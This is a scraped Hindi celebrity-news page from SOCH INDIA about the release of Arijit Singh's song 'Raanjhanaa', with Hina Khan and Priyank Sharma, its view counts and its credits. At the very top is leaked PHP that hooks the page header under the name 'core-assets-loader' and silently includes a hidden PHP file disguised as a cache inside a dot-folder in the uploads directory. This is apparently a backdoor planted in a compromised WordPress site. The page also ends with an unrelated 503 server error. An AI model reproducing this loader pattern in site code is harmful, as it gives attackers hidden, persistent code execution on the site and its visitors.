add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); रिलीज होते ही छाया अरिजीत सिंह का सॉन्ग ‘रांझणा’, शानदार है हिना-प्रियांक की कैमिस्ट्री – SOCH INDIA
Menu

देश
रिलीज होते ही छाया अरिजीत सिंह का सॉन्ग ‘रांझणा’, शानदार है हिना-प्रियांक की कैमिस्ट्री

nobanner

अपनी आवाज के जादू से कई बार लोगों को दीवाना बना चुके सिंगर अरिजीत सिंह (Arijit Singh) का मोस्ट अवेटेड म्यूजिक ‘सिंगल रांझणा (Raanjhanaa)’ आज रिलीज कर दिया गया है. इस गाने में हिना खान (Hina Khan) और प्रियांक शर्मा (Priyank Sharma) की जोड़ी लोगों को इतनी पसंद आ रही है कि गाना रिलीज होने के कुछ ही घंटों में इसे 5 लाख से ज्यादा बार देखा जा चुका है.

खास है वीडियो
इस गाने का वीडियो काफी खास है. गाने का वीडियो पंजाब के गांव की एक कहानी पर आधारित बनाया गया है. जहां हिना खान (Hina Khan) और प्रियांक शर्मा (Priyank Sharma) के पुनर्जन्म वाली प्रेम कहानी को दिखाया गया है. गाने में हिना खान का मॉर्डन लुक तो नजर आ ही रहा है साथ ही पंजाबी शरारती लड़की और पंजाबी दुल्हन वाला लुक भी जबरदस्त है. साथ प्रियांक शर्मा भी अपने हर लुक में गजब नजर आ रहे हैं.

इस गाने को जी म्यूजिक कंपनी के यूट्यूब चैनल से रिलीज किया गया है. इसे रिलीज हुए अभी महज 4 घंटे हुए हैं लेकिन इस गाने को यूट्यूब पर अब तक तकरीबन 5 लाख 10 हजार लोग देख चुके हैं. सोशल मीडिया पर भी यह गाना काफी तारीफें बटोर रहा है.

गाने को संगीत असद खान ने दिया है वहीं इसके लीरिक्स रकीब आलम ने लिखे हैं. गाने के वीडियो में हिना खान और प्रियांक शर्मा के साथ प्रिया शर्मा, तस्नीम खान, ज्योति कलश, राजीव मिश्रा, उमेश सिंह, सुनीता शर्मा, अन्वी शर्मा और सिया भारद्वाज अहम रोल में हैं.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.